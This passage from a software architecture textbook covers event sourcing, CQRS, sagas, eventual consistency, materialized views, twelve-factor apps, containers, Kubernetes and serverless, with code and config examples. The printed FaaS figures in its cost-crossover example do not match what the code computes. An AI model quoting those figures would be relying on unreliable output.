if len(tail) >= snapshot_every:
store.save_snapshot(account_id, state, seq=start + len(tail))
return state
# A snapshot is a cache, never the truth. If it is wrong, delete it and
# replay -- which is only possible because the log is authoritative.
The costs are real and should be stated plainly. Event schemas are forever: a 2019 event must still be readable in 2029, so you need upcasting (transforming old event shapes on read) and a strict no-rewrite policy. Deleting personal data conflicts with an immutable log, which is normally resolved by crypto-shredding — encrypting personal fields with a per-subject key and destroying the key on erasure. And the model is unfamiliar enough that a team adopting it everywhere will slow down; it belongs in the parts of the domain where history genuinely matters — ledgers, orders, compliance-heavy workflows — not in the CRUD around them.
Key Takeaways
- Event sourcing stores an append-only log of facts and derives current state by folding it; the log is the source of truth.
- It gives a complete audit trail, time-travel queries, and the ability to re-derive state after fixing a bug — things ordinary rows destroy.
- Snapshots make replay cheap and are always a cache that can be deleted and rebuilt.
- Event schemas are permanent: plan for upcasting old shapes and never rewrite history.
- Personal-data erasure needs crypto-shredding; apply event sourcing to the parts of the domain where history matters, not everywhere.
🧪 Practice
- Model a shopping cart as events and write the fold that produces the current cart plus a function that answers "what was in it an hour ago?".
- Add snapshotting to that model and show that deleting a snapshot changes no answer, only the time taken.
- Interview: How do you satisfy a data-deletion request in an event-sourced system? (Hint: think about what must stay immutable and what could be made unreadable instead.)
CQRS
CQRS — Command Query Responsibility Segregation — separates the model used to change state from the model used to read it. Commands go through one path that enforces invariants; queries are served from separate, purpose-built read models. The two sides can use different schemas, different stores, and scale independently.
The motivation is that reads and writes want opposite things. Writes want a normalized model that enforces invariants: one place per fact, constraints, transactions. Reads want denormalized, pre-joined shapes matching each screen, with no joins at request time. A single model serving both compromises on each — which shows up as a "dashboard query" with eleven joins running against the tables the checkout path also needs.
command side query side
client --> [ command handler ] client --> [ query handler ]
| |
validate invariants no rules, no joins
| |
+--------------+ +----------------+
| write model | --events--> | read model(s) |
| normalized | projector | denormalized |
+--------------+ +----------------+
Postgres, strict Elasticsearch / Redis /
transactions a wide "screen-shaped" table
Writes: correctness. Reads: shape and speed. Bridge: events + lag.
# ---- COMMAND side: rules live here, and only here --------------------------
class PlaceOrderHandler:
def __init__(self, write_db, events): self.db, self.events = write_db, events
def handle(self, cmd):
if not cmd["items"]:
raise ValueError("empty order")
with self.db.transaction(): # normalized + ACID
order_id = self.db.insert("orders", {"customer_id": cmd["customer_id"],
"status": "placed"})
for it in cmd["items"]:
self.db.insert("order_items", {"order_id": order_id, **it})
self.events.publish({"type": "OrderPlaced", "order_id": order_id,
"customer_id": cmd["customer_id"],
"items": cmd["items"]}) # same transaction
return order_id # returns an ID, not a view
# ---- PROJECTOR: turns events into whatever shape a screen wants ------------
def project_order_placed(event, read_db, customers_read_model):
customer = customers_read_model.get(event["customer_id"])
read_db.upsert("order_summaries", { # one row per SCREEN, not
"order_id": event["order_id"], # per normalized entity
"customer_name": customer["display_name"], # pre-joined at write time
"item_count": len(event["items"]),
"total": sum(i["price"] * i["qty"] for i in event["items"]),
"status": "placed",
})
# ---- QUERY side: a single-row lookup, no joins, no business rules ----------
def get_order_summary(order_id, read_db):
return read_db.get("order_summaries", order_id)
CQRS is frequently paired with event sourcing but is entirely independent of it: you can run CQRS with two SQL schemas and a projector fed by change data capture, and you can event-source without separate read models. The pairing is popular because an event log is a natural projector input.
The cost is the lag between the two sides and the user-visible weirdness it creates: a user submits a form, is redirected to a list, and does not see their own change. This must be handled deliberately, not discovered.
| Technique | How it works | Trade-off |
|---|---|---|
| Return the result | Command returns the created entity's view | Only fixes the next screen |
| Optimistic UI | Client renders the expected result immediately | Client must handle rejection |
| Read-your-writes routing | Route that user's reads to the write model | Extra load on the write side |
| Version token | Client passes the version it must see | Query may block or retry |
Use CQRS where read and write loads or shapes genuinely diverge — a product catalogue with heavy faceted search and rare updates, an order system with complex dashboards — and not for a CRUD screen, where it doubles the model count for no return.
Key Takeaways
- CQRS separates the write model (normalized, invariant-enforcing) from read models (denormalized, shaped per screen).
- The two sides scale, store, and evolve independently; the bridge is events or change data capture, and the bridge has lag.
- CQRS and event sourcing are independent; they are combined often, not necessarily.
- Plan explicitly for read-your-writes, or users will not see the change they just made.
- Apply it where read and write requirements genuinely diverge, not to CRUD.
🧪 Practice
- Design one read model for an "orders dashboard" screen and list the events that keep it current.
- Implement read-your-writes for a form submission using two of the four techniques in the table and compare their cost.
- Interview: What breaks if a projector is offline for an hour? (Hint: think about what is still correct, what is stale, and what happens when the projector restarts and processes the backlog.)
Choreography vs. Orchestration
A workflow spanning several services can be coordinated in two ways. Choreography: each service reacts to events and emits its own, with no central controller — the flow is an emergent property of the subscriptions. Orchestration: a coordinator explicitly tells each service what to do and tracks the workflow's state.
The trade is between coupling and visibility. Choreography adds services without changing existing ones — a new consumer just subscribes — which is why it scales so well organizationally. But nobody owns the workflow: no code describes it, and answering "why is this order stuck?" means correlating logs across five services. Orchestration puts the process in one readable place with explicit state, at the cost of a component that knows about everyone and can become a bottleneck.
CHOREOGRAPHY ORCHESTRATION
[order] --OrderPlaced--> (bus) [ order saga orchestrator ]
/ | \ | 1. reserve stock ->[inventory]
v v v | 2. charge card ->[payments]
[payment] [inventory] [email] | 3. book shipment ->[shipping]
| | | 4. send email ->[email]
v v |
PaymentTaken StockReserved +-- state: step 2, retrying
| compensation is explicit
v
[shipping] (waits for BOTH) one place to read the process;
one place to change it
no central knowledge;
the flow exists only in the
subscription graph
# ORCHESTRATION: the workflow is code you can read, test, and query.
class PlaceOrderSaga:
STEPS = [
# (do, undo)
("reserve_stock", "release_stock"),
("charge_payment", "refund_payment"),
("book_shipment", "cancel_shipment"),
]
def __init__(self, services, store): self.svc, self.store = services, store
def run(self, order_id):
done = []
for do, undo in self.STEPS:
self.store.set_state(order_id, step=do, status="running") # queryable
try:
getattr(self.svc, do)(order_id)
done.append(undo)
except Exception as e:
# Compensate in REVERSE order: undo only what actually happened.
for compensation in reversed(done):
getattr(self.svc, compensation)(order_id)
self.store.set_state(order_id, step=do, status="failed",
error=str(e))
raise
self.store.set_state(order_id, step="complete", status="ok")
# CHOREOGRAPHY: the same flow, but no single place describes it.
def on_order_placed(event, inventory, bus):
inventory.reserve(event["order_id"])
bus.publish({"type": "StockReserved", "order_id": event["order_id"]})
def on_stock_reserved(event, payments, bus):
payments.charge(event["order_id"])
bus.publish({"type": "PaymentTaken", "order_id": event["order_id"]})
def on_payment_failed(event, inventory, bus):
inventory.release(event["order_id"]) # compensation lives with each
bus.publish({"type": "OrderCancelled", "order_id": event["order_id"]})
# To understand the whole flow you must read every handler in every repo,
# and nothing tells you a step is missing until an order sits half-done.
| Dimension | Choreography | Orchestration |
|---|---|---|
| Coupling | Low; add consumers freely | Coordinator knows all steps |
| Workflow visibility | Emergent; no single description | Explicit and queryable |
| Debugging a stuck flow | Correlate logs across services | Read the saga's state row |
| Changing the process | Edit several services | Edit one component |
| Failure handling | Compensation scattered | Compensation centralized |
| Bottleneck risk | None | The coordinator |
| Best for | Notifications, fan-out reactions | Transactional multi-step business processes |
The practical rule is to choose by how much the flow matters as a thing. If the sequence has business meaning, needs status reporting, has ordering constraints, or requires compensation on failure, orchestrate it — order fulfilment, loan approval, subscription provisioning. If services merely need to know something happened and their reactions are independent, choreograph — send the email, update the search index, warm a cache. Most real systems use both, and the mistake is choreographing a business-critical transaction because events were already available.
Key Takeaways
- Choreography is event reactions with no central controller; orchestration is an explicit coordinator that drives and tracks steps.
- Choreography minimizes coupling and maximizes extensibility but leaves the workflow undocumented and hard to debug.
- Orchestration gives one readable, queryable definition of the process and centralizes compensation, at the cost of a component that knows everyone.
- Orchestrate flows with business meaning, ordering, or compensation; choreograph independent reactions to a fact.
- The orchestrator must persist workflow state — an in-memory saga loses the process on restart.
🧪 Practice
- Model a four-step checkout as an orchestrated saga with a compensation for each step, and state what happens if the orchestrator crashes at step 3.
- Rewrite the same flow as choreography and list every place a developer must look to answer "where is order 8891 stuck?".
- Interview: Your orchestrator has become a bottleneck and knows about twelve services. What do you do? (Hint: consider whether it is one workflow or several, and which steps really need central sequencing.)
Eventual Consistency in Practice
Eventual consistency means that if updates stop, all replicas and derived views will converge to the same state — but at any given moment they may disagree. Chapter 8 covered the theory; this topic is about the design work it forces, most of which is product design rather than infrastructure.
The first move is to stop asking "is eventual consistency acceptable?" as a system-wide question. It is a per-operation question, and the answers differ sharply within one product. A like counter can lag ten seconds. An account balance shown before a withdrawal cannot. Writing this down as a table is the most valuable half hour in an event-driven design.
| Operation | Tolerable lag | Why |
|---|---|---|
| Follower count on a profile | Minutes | Nobody can tell, nobody is harmed |
| Search index after an edit | Seconds | Users retry; a stale hit is survivable |
| Order status after checkout | Immediate | The user just acted and is watching |
| Balance check for a payout | Immediate | Overdraft is a financial loss |
| Inventory count on a listing | Seconds | Oversell must be handled at reserve time |
The second move is to design the user experience of inconsistency rather than letting it leak. A user who submits a change and does not see it assumes failure and retries, which creates duplicates. The standard remedies are read-your-writes routing for that user, optimistic UI that renders the expected outcome immediately, and explicit "pending" states that tell the truth: the system has accepted the request and has not finished.
# Read-your-writes without making the whole system strongly consistent.
# After a write, pin THAT user's reads to the authoritative source briefly.
PIN_WINDOW_SECONDS = 5
def after_write(session, now):
session["read_pin_until"] = now + PIN_WINDOW_SECONDS # only this user
def get_orders(user, session, now, write_db, read_replica):
if session.get("read_pin_until", 0) > now:
return write_db.query_orders(user.id) # authoritative, costlier
return read_replica.query_orders(user.id) # cheap, may lag
# 99.9% of reads still come from the replica; only the few seconds after a
# user's own write are routed to the primary. This is the cheapest fix for
# the single most common eventual-consistency complaint.
The third move is to make consumers idempotent and order-tolerant, because at-least-once delivery and reordering are facts of life in every broker. Idempotency comes from deduplicating on an event ID or from making the operation naturally repeatable. Ordering is handled by carrying a version or timestamp and ignoring anything older than what you already applied — last-write-wins on a monotonic field is crude but correct for most projections.
def apply_profile_update(event, read_db, seen):
# 1. Idempotence: the same event delivered twice must change nothing.
if event["event_id"] in seen:
return
seen.add(event["event_id"])
# 2. Order tolerance: an older event arriving late must not overwrite newer
# state. Compare a monotonic version carried BY the event.
current = read_db.get("profiles", event["user_id"]) or {"version": -1}
if event["version"] <= current["version"]:
return # stale replay: drop it
read_db.upsert("profiles", {"user_id": event["user_id"],
"name": event["name"],
"version": event["version"]})
Finally, converge on purpose. Systems that rely only on incremental events drift: messages are lost, projectors have bugs, and consumers are down during a schema change. Mature event-driven systems run a periodic reconciliation job that compares derived state against the source of truth and repairs differences, and they monitor consumer lag as a first-class SLI — because lag is the metric that tells you whether "eventually" is currently five seconds or five hours.
Key Takeaways
- Consistency requirements are per-operation, not per-system; write the table of tolerable lag before designing the flows.
- Design the UX of inconsistency: read-your-writes pinning, optimistic UI, and honest "pending" states prevent user-driven duplicate submissions.
- Every consumer must be idempotent (dedupe by event ID) and order-tolerant (ignore versions older than what it applied).
- Run reconciliation jobs against the source of truth; incremental updates drift.
- Monitor consumer lag as a first-class signal — it is the measurable form of "eventually".
🧪 Practice
- Build the tolerable-lag table for a system you know and mark the operations that must not be served from a derived view.
- Make an existing event handler idempotent and order-tolerant, then prove it by replaying its events shuffled and duplicated.
- Interview: A user updates their profile and the old name still appears. Walk through your options. (Hint: distinguish fixing the lag from fixing what this particular user sees, and consider which is cheaper.)
Materialized Views
A materialized view is a query result stored as data and kept up to date, rather than computed on each request. In an event-driven system it is the natural consumer of events: subscribe to the facts, maintain a table shaped exactly like the screen or the API response, and serve reads from it with a single lookup.
The reason to precompute is that read and write frequencies rarely match. A seller dashboard showing revenue per product per day might be requested a hundred times an hour and change a few times an hour. Recomputing a large aggregation on every request wastes work proportional to the read rate; maintaining it on write does work proportional to the (much lower) write rate. The trade is storage plus staleness in exchange for a predictable, cheap read.
COMPUTE ON READ MATERIALIZED VIEW
GET /dashboard GET /dashboard
| |
v v
SELECT p.name, SUM(oi.qty*oi.price) SELECT * FROM seller_dashboard
FROM orders o WHERE seller_id = ?
JOIN order_items oi ON ... |
JOIN products p ON ... v
WHERE o.seller_id = ? AND o.day = ? one indexed row read: ~1 ms
GROUP BY p.name ^
| |
v [ projector ] <-- OrderPlaced events
3-table join, 400 ms, every request updates on WRITE, not on read
-- Some databases maintain views for you. Postgres materialized views are
-- explicit snapshots -- fast to read, but stale until refreshed.
CREATE MATERIALIZED VIEW seller_daily_revenue AS
SELECT o.seller_id,
date_trunc('day', o.placed_at) AS day,
COUNT(*) AS order_count,
SUM(oi.qty * oi.unit_price) AS revenue
FROM orders o
JOIN order_items oi ON oi.order_id = o.id
GROUP BY 1, 2;
CREATE UNIQUE INDEX ON seller_daily_revenue (seller_id, day);
-- CONCURRENTLY avoids locking readers during the rebuild; it requires the
-- unique index above and is slower than a plain REFRESH.
REFRESH MATERIALIZED VIEW CONCURRENTLY seller_daily_revenue;
-- Note the model: full recompute on a schedule. Simple and self-correcting,
-- but the cost grows with total data, not with what changed.
# Event-driven maintenance: incremental, so cost tracks CHANGE, not data size.
def on_order_placed(event, view_db):
day = event["occurred_at"][:10]
view_db.execute("""
INSERT INTO seller_daily_revenue (seller_id, day, order_count, revenue)
VALUES (%s, %s, 1, %s)
ON CONFLICT (seller_id, day) DO UPDATE
SET order_count = seller_daily_revenue.order_count + 1,
revenue = seller_daily_revenue.revenue + EXCLUDED.revenue
""", (event["seller_id"], day, event["total"]))
# Incremental updates are cheap but accumulate error: a missed or
# double-applied event silently skews the number forever. Which is why
# incremental views need periodic full recomputation to reconcile.
The two maintenance strategies are worth comparing directly, because most systems end up using both — incremental for freshness, periodic full rebuild for correctness.
| Strategy | Cost scales with | Freshness | Failure behaviour |
|---|---|---|---|
| Full refresh on timer | Total data size | Up to the interval | Self-correcting each run |
| Incremental on events | Number of changes | Seconds | Errors accumulate; needs repair |
| Rebuild from log | Log length | On demand | The recovery mechanism itself |
Three design rules make materialized views durable. Keep them disposable: a
view must be rebuildable from the source of truth, which means the projector is
deterministic and the events are retained long enough to replay. Version the
view, so a schema change builds orders_summary_v2 alongside v1 and switches
reads once it has caught up — far safer than mutating a live view. And monitor
staleness explicitly, exposing the age of the newest applied event so a stalled
projector is an alert rather than a support ticket about wrong numbers.
Key Takeaways
- A materialized view precomputes a query result and serves reads with a single lookup; it pays off whenever reads outnumber writes.
- Database-maintained views refresh in full on a schedule — simple and self-correcting, but the cost scales with total data.
- Event-driven projections update incrementally, so cost tracks change rate, at the risk of accumulated drift; reconcile with periodic full rebuilds.
- Views must be disposable and rebuildable from the source of truth; that is what makes bug fixes and schema changes safe.
- Build a new version alongside the old and switch reads after catch-up, and alert on view staleness.
🧪 Practice
- Take a slow multi-join dashboard query and design the view table plus the events that maintain it, including the primary key.
- Write the incremental projector for that view, then write the full rebuild that reconciles it, and describe how you would detect divergence.
- Interview: A materialized view has been showing wrong totals for a week. What is your recovery plan? (Hint: think about what makes a rebuild possible at all, and how you would switch traffic without a gap.)
<a id="104-cloud-native-and-serverless"></a>
10.4 Cloud-Native and Serverless
Cloud-native describes applications built to be run by a platform that schedules, scales, and restarts them without human intervention. This subchapter covers the application-level contract that makes that possible, the packaging and orchestration layer beneath it, the serverless extreme where the platform owns the process lifecycle entirely, and the architectural choices — buy versus build, and how to isolate tenants — that surround them.
Twelve-Factor App Principles
The twelve-factor methodology is a set of application-level rules that make a process safely disposable, replicable, and portable. The rules predate Kubernetes and serverless but describe exactly the contract those platforms assume: the platform reserves the right to kill your process, start ten more, move them to another machine, and inject configuration. An application that violates the contract will appear to work and then fail in ways that look like platform bugs.
The factors that carry the most architectural weight are these:
- Config in the environment. Anything that differs between deployments — credentials, endpoints, feature flags — comes from environment variables, not from files baked into the build. The same artifact must run in staging and production.
- Backing services are attached resources. A database, a cache, or a queue is referenced by a URL in config, so swapping a local Postgres for a managed one is a config change, not a code change.
- Processes are stateless. Nothing persistent lives in local memory or on local disk; session state goes to a shared store. This is what makes any instance able to serve any request.
- Disposability. Start fast and shut down gracefully on
SIGTERM: stop accepting new work, finish what is in flight, then exit. Slow startup delays scaling; ungraceful shutdown drops requests on every deploy. - Dev/prod parity. Keep environments and backing services similar, so a bug cannot hide behind SQLite-in-dev, Postgres-in-prod.
- Logs are event streams. Write to stdout and let the platform route; an app that manages its own log files fights the platform's rotation and collection.
import os, signal, sys, time
# --- Factor 3: config from the environment, with no production defaults -----
DB_URL = os.environ["DATABASE_URL"] # required: fail fast
PORT = int(os.environ.get("PORT", "8080")) # platform-assigned
LOG_LEVEL= os.environ.get("LOG_LEVEL", "info")
# Note there is no `if env == "production"` branch anywhere: the SAME image
# runs everywhere, and only the injected values differ.
# --- Factor 6: stateless. Session data goes to a shared store, never here. --
# sessions = {} # WRONG: instance 2 cannot see instance 1's sessions
sessions = RedisStore(os.environ["REDIS_URL"]) # RIGHT: shared, external
# --- Factor 9: disposability. Handle SIGTERM or lose in-flight requests. ----
shutting_down = False
def handle_sigterm(signum, frame):
global shutting_down
shutting_down = True # 1. fail readiness -> LB stops sending
time.sleep(5) # 2. let the LB notice before we close
server.stop(grace_seconds=30) # 3. finish in-flight work
sys.exit(0)
signal.signal(signal.SIGTERM, handle_sigterm)
def readiness():
# The platform asks "should I send traffic?" -- answer honestly.
return 503 if shutting_down else 200
# --- Factor 11: logs to stdout as a stream; the platform collects them ------
def log(event, **fields):
print({"event": event, "level": LOG_LEVEL, **fields}, flush=True)
The most consequential factor is statelessness, because it is the one that quietly breaks. An in-memory cache is state; so is an uploaded file written to local disk, a background timer that only one instance should run, and a "warm-up" step whose result lives in a global. Each works with one instance and produces confusing, load-dependent bugs with several. The test is blunt: if killing any instance at any moment and starting a fresh one elsewhere loses nothing a user cares about, the application is stateless.
| Factor | Violation that looks fine locally | Failure at scale |
|---|---|---|
| Config in env | config/production.yaml in the image | Rebuild per environment; leaked secrets |
| Stateless processes | In-memory session map | Random logouts across instances |
| Disposability | No SIGTERM handler | Dropped requests on every deploy |
| Logs as streams | Writing to /var/log/app.log | Logs lost when the container dies |
| Backing services | Hardcoded localhost:5432 | Cannot move or fail over the DB |
Key Takeaways
- Twelve-factor is the contract that lets a platform kill, restart, replicate, and relocate your process safely.
- Config comes from the environment so one artifact runs everywhere; no environment branches in code.
- Statelessness is the factor that breaks most subtly — in-memory caches, local files, and singleton timers are all state.
- Handle
SIGTERMby failing readiness first, then draining, or every deploy drops requests.- Log to stdout and treat backing services as attached, swappable resources.
🧪 Practice
- Audit a service against the five factors in the table and write the smallest change that fixes the worst violation.
- Add a graceful-shutdown path that fails readiness, drains for 30 seconds, and exits; verify no request is dropped during a rolling restart.
- Interview: An app works with one instance but users are randomly logged out with three. What is wrong? (Hint: ask where session state lives and which instance can see it.)
Containers and Orchestration
A container packages an application with its dependencies into an image that runs identically anywhere the same kernel interface exists. Chapter 2 covered the mechanics — namespaces for isolation, cgroups for limits, a shared kernel rather than a guest OS. What matters architecturally is what containers make possible: a uniform deployable unit, so the platform can treat every workload the same way.
That uniformity is the precondition for orchestration. Once every service is "an image plus a config plus a resource request", a scheduler can place it on any machine with capacity, restart it when it dies, scale it by count, and roll a new version out gradually — without knowing anything about the language inside.
WITHOUT ORCHESTRATION WITH ORCHESTRATION
host-1: svc-a, svc-a, svc-b you declare: svc-a: 6 replicas, 500m CPU
host-2: svc-b, svc-c the scheduler decides:
host-3: (idle, wrong config) - which hosts have room
- spread across failure domains
placement: a human and a wiki - restart what dies
a host dies: a human notices - drain a host being replaced
scaling up: a ticket
you describe the DESIRED state;
a control loop makes reality match
The core idea underneath every orchestrator is the reconciliation loop: compare desired state with observed state, act to close the gap, repeat forever. It is worth understanding as a pattern, because it explains why declarative platforms behave the way they do — including why deleting a pod by hand immediately gets you a new one.
# The control loop that every orchestrator is a large, careful version of.
def reconcile(desired, observe, create, destroy, interval=5):
while True:
actual = observe() # what is really running now
for name, spec in desired.items():
running = actual.get(name, 0)
if running < spec["replicas"]:
create(name, spec, count=spec["replicas"] - running)
elif running > spec["replicas"]:
destroy(name, count=running - spec["replicas"])
sleep(interval)
# Consequences worth internalizing:
# - Manual changes are UNDONE: the loop only respects the declared state.
# - Convergence is eventual: "kubectl apply" returns before reality matches.
# - The loop is level-triggered, not edge-triggered, so a missed event is
# harmless -- the next pass observes reality again and corrects.
Image construction has real architectural consequences. Large images slow every scale-up and deploy, because the node must pull them; images running as root widen the blast radius of any compromise; images that bake in configuration break dev/prod parity. A multi-stage build addresses the first two directly.
# ---- build stage: compilers and dev dependencies live only here ------------
FROM golang:1.22 AS build
WORKDIR /src
COPY go.mod go.sum ./
RUN go mod download # cached layer: deps change rarely
COPY . .
RUN CGO_ENABLED=0 go build -o /out/app ./cmd/server
# ---- runtime stage: only the binary ships --------------------------------
FROM gcr.io/distroless/static:nonroot # no shell, no package manager
COPY --from=build /out/app /app
USER nonroot:nonroot # never root in the runtime image
EXPOSE 8080
ENTRYPOINT ["/app"]
# Result: ~15 MB instead of ~900 MB. That difference is felt on every cold
# node pull -- which is exactly when you are already scaling under load.
Two boundaries are worth stating plainly. Containers isolate by namespace on a shared kernel, so they are a weaker security boundary than a VM — for untrusted, multi-tenant code, use stronger isolation (microVMs, separate node pools). And containers are ephemeral by design: anything written to the container filesystem disappears on restart, so persistence belongs in an attached volume or, better, an external service.
Key Takeaways
- Containers make every workload a uniform deployable unit, which is what makes orchestration possible.
- Orchestrators run a reconciliation loop: declared desired state, observed actual state, actions to close the gap — so manual changes get reverted.
- Convergence is eventual and level-triggered; a missed event self-heals on the next pass.
- Multi-stage builds and minimal base images cut pull time and attack surface; image size is felt exactly when you are scaling under load.
- Containers share a kernel (weaker isolation than VMs) and have ephemeral filesystems; state belongs outside.
🧪 Practice
- Convert a single-stage Dockerfile to multi-stage with a non-root runtime and measure the image size difference.
- Write the pseudocode for a reconciliation loop that also handles a version change, not just a replica-count change.
- Interview: Why does deleting a running container by hand not remove the workload? (Hint: think about what the platform is comparing against and how often.)
Kubernetes Concepts for Architects
Kubernetes is the dominant orchestrator, and an architect needs its object model rather than its full command surface. The model is small: a handful of objects that compose, all governed by the same declarative reconciliation loop.
+----------------------------------+
kubectl apply -> | API server (desired state) |
+----------------------------------+
| ^
controllers watch kubelets report
v |
Deployment -> ReplicaSet -> Pod (1+ containers, shared network + volumes)
^ |
| scheduled onto a Node
Service (stable virtual IP + DNS) --> selects Pods by LABEL, load balances
^
Ingress / Gateway (HTTP routing, TLS termination) --> Service
ConfigMap / Secret --> injected into Pods as env vars or mounted files
HorizontalPodAutoscaler --> adjusts the Deployment's replica count
PersistentVolumeClaim --> durable storage attached to a Pod
The objects that matter for design decisions:
| Object | What it is | Architectural meaning |
|---|---|---|
| Pod | Smallest unit; 1+ containers sharing network and volumes | The scheduling and failure unit |
| Deployment | Declares replicas of a stateless pod template | Rolling updates and rollbacks |
| StatefulSet | Pods with stable identity and storage | For databases and quorum systems |
| Service | Stable virtual IP + DNS over pods | Decouples callers from pod churn |
| Ingress/Gateway | HTTP(S) routing into the cluster | Where the strangler facade often lives |
| ConfigMap/Secret | Injected configuration | Twelve-factor config, externalized |
| HPA | Scales replicas on a metric | The autoscaling policy, as data |
apiVersion: apps/v1
kind: Deployment
metadata:
name: orders
spec:
replicas: 4
selector:
matchLabels: { app: orders } # must match the pod template's labels
template:
metadata:
labels: { app: orders }
spec:
containers:
- name: app
image: registry.example.com/orders:1.14.2 # pin a digest in production
ports: [ { containerPort: 8080 } ]
env:
- name: DATABASE_URL
valueFrom:
secretKeyRef: { name: orders-db, key: url } # config from env
resources:
requests: { cpu: "250m", memory: "256Mi" } # used for SCHEDULING
limits: { cpu: "1000m", memory: "512Mi" } # enforced at RUNTIME
# Two probes with two different jobs -- conflating them causes outages.
readinessProbe: # "send me traffic?" -> removed from
httpGet: { path: /readyz, port: 8080 } # the Service if failing
periodSeconds: 5
livenessProbe: # "am I wedged?" -> RESTARTED
httpGet: { path: /healthz, port: 8080 } # if failing
periodSeconds: 10
failureThreshold: 3
Three details cause most production surprises. Requests versus limits:
requests drive scheduling and limits are enforced at runtime — exceeding a memory
limit is an OOM kill, while exceeding a CPU limit is throttling, which shows up
as mysterious tail latency. Liveness probes are dangerous when they check
dependencies: if /healthz returns 503 because the database is slow,
Kubernetes restarts every pod simultaneously and turns a degraded dependency into
a full outage; liveness should test only whether this process is wedged, while
readiness may consider dependencies. And PodDisruptionBudget plus anti-affinity
are what keep a rolling node upgrade from taking all replicas of a service at
once.
Architecturally, the important consequence is that a great deal of what used to be application code becomes platform configuration: retries and traffic shifting at the ingress or service mesh, autoscaling policy in an HPA, secrets injection, rolling deploys and rollback. That is a real reduction in bespoke code, paid for with a platform that must itself be operated, upgraded, and understood — which is the honest argument for a managed control plane over a self-run one.
Key Takeaways
- The object model is small and composes: Pod, Deployment/StatefulSet, Service, Ingress, ConfigMap/Secret, HPA — all reconciled from declared state.
- Requests drive scheduling; limits are enforced at runtime — memory over limit is an OOM kill, CPU over limit is throttling that looks like latency.
- Readiness controls traffic, liveness controls restarts; a liveness probe that checks dependencies converts a degraded dependency into a cluster-wide restart.
- StatefulSets exist for workloads needing stable identity and storage; most application services should be Deployments.
- Kubernetes moves retries, scaling, secrets, and rollout policy from code into configuration — real leverage, at the cost of operating the platform.
🧪 Practice
- Write a Deployment plus Service for a stateless API with sensible requests, limits, and both probes, and explain each probe's endpoint.
- Explain what happens to a pod that exceeds its memory limit versus its CPU limit, and how each looks in monitoring.
- Interview: Every pod of a service restarted at once during a database slowdown. What is the most likely cause? (Hint: look at what the liveness probe was checking.)
Function-as-a-Service
Function-as-a-Service (FaaS) takes the platform's ownership of the process to its conclusion: you deploy a function, the platform runs it in response to an event, scales the number of concurrent executions from zero to thousands, and bills for execution time. There are no instances to size, no idle capacity to pay for, and no servers to patch.
The architectural shift is that the unit of deployment becomes a single handler, and the unit of scaling becomes a single invocation. That produces an extremely good fit for spiky, event-driven, embarrassingly parallel work — and an extremely poor fit for anything that wants to hold state, keep a long-lived connection, or respond with consistently low latency.
# A FaaS handler: no server, no port, no lifecycle. Just the work.
import json, os
# Module scope runs ONCE per execution environment, not once per request.
# Put expensive setup here so warm invocations skip it entirely.
db = connect(os.environ["DATABASE_URL"]) # reused across invocations
def handler(event, context):
# The handler must be idempotent: platforms retry on failure, and an
# at-least-once event source can deliver the same record twice.
record = json.loads(event["body"])
key = record["idempotency_key"]
if db.exists("processed", key): # dedupe on a durable key
return {"statusCode": 200, "body": '{"status":"already_done"}'}
db.transaction(lambda tx: (
tx.insert("orders", record),
tx.insert("processed", {"key": key}), # same transaction as the work
))
# context.get_remaining_time_in_millis() exists because there IS a hard
# timeout -- long work must be split or moved to a different compute model.
return {"statusCode": 201, "body": '{"status":"created"}'}
The constraints are the design content, and they are not negotiable:
| Constraint | Typical shape | Design consequence |
|---|---|---|
| Execution timeout | Seconds to ~15 minutes | Long jobs must be chunked or moved |
| No local state | Filesystem is ephemeral and scratch | State lives in a database or object store |
| Cold starts | Tens of ms to seconds | Latency-sensitive paths need warming or containers |
| Connection pooling | One pool per environment, N environments | Databases need a proxy/pooler |
| Per-invocation billing | Cost tracks usage exactly | Great at low/spiky volume, poor at sustained high volume |
The database connection issue deserves emphasis because it is the most common way a FaaS design fails in production. Each concurrent execution environment holds its own connections, so 500 concurrent invocations can attempt 500 connections against a database sized for 100 — the function scales elastically and the database does not. The fixes are a connection proxy that multiplexes, an HTTP data API, or deliberately capping concurrency.
# Cost crossover: FaaS versus a container running continuously.
def faas_monthly(invocations, avg_ms, gb, per_req=0.20e-6, per_gb_s=0.0000166667):
gb_seconds = invocations * (avg_ms / 1000) * gb
return invocations * per_req + gb_seconds * per_gb_s
def container_monthly(instances, hourly=0.05):
return instances * hourly * 730
for rps in (1, 10, 100, 500):
inv = rps * 60 * 60 * 730
# A rough sizing rule: ~100 rps per instance at 200 ms per request.
instances = max(2, round(rps / 100 * 2)) # x2 for redundancy
print(f"{rps:4} rps faas ${faas_monthly(inv, 200, 0.5):8.2f}"
f" containers ${container_monthly(instances):8.2f}")
# 1 rps faas $ 5.24 containers $ 73.00
# 10 rps faas $ 52.42 containers $ 73.00
# 100 rps faas $ 524.16 containers $ 73.00
# 500 rps faas $ 2620.80 containers $ 365.00
#
# Serverless wins decisively at low and spiky volume and loses badly at
# sustained high volume. Both numbers ignore operational effort, which is
# precisely the term that favours serverless for small teams.
The right architectural use is therefore targeted rather than total: glue between managed services, event processing, scheduled jobs, webhook receivers, and bursty workloads, alongside long-running containers for the steady, latency- sensitive core. "All serverless" and "no serverless" are both usually wrong.
Key Takeaways
- FaaS makes a single handler the unit of deployment and a single invocation the unit of scaling, with no idle cost.
- Handlers must be stateless and idempotent: platforms retry, and event sources deliver at least once.
- Hard timeouts, ephemeral storage, and cold starts are the binding constraints, not implementation details.
- Elastic concurrency against a fixed-size database needs a connection proxy or a concurrency cap.
- Cost favours FaaS at low and spiky volume and containers at sustained high volume; mix the two deliberately.
🧪 Practice
- Convert a scheduled batch job into a function, identifying what must move out of local state and how you would chunk the work under a timeout.
- Compute the monthly cost crossover between FaaS and containers for your own traffic profile, and state which assumption the answer is most sensitive to.
- Interview: A function works in testing and exhausts database connections in production. Why? (Hint: think about how many execution environments exist at peak concurrency and what each one opens.)
Cold Starts and Concurrency Limits
A cold start is the latency added when a request must wait for a new execution environment: allocate a sandbox, load the runtime, initialize the code, then run the handler. A warm invocation skips all but the last step. This is the defining latency characteristic of serverless platforms and the most common reason teams abandon them for user-facing paths.
COLD INVOCATION WARM INVOCATION
|--sandbox--|--runtime--|--init--|--handler--| |--handler--|
~50ms ~100ms ~200ms ~20ms ~20ms
total: ~370 ms total: ~20 ms
What lands in each bucket:
sandbox platform: image/snapshot size, VPC attachment
runtime language: JVM and .NET slowest, Go/Rust/JS fastest
init YOURS: imports, config loads, client construction, DB connect
handler the actual request
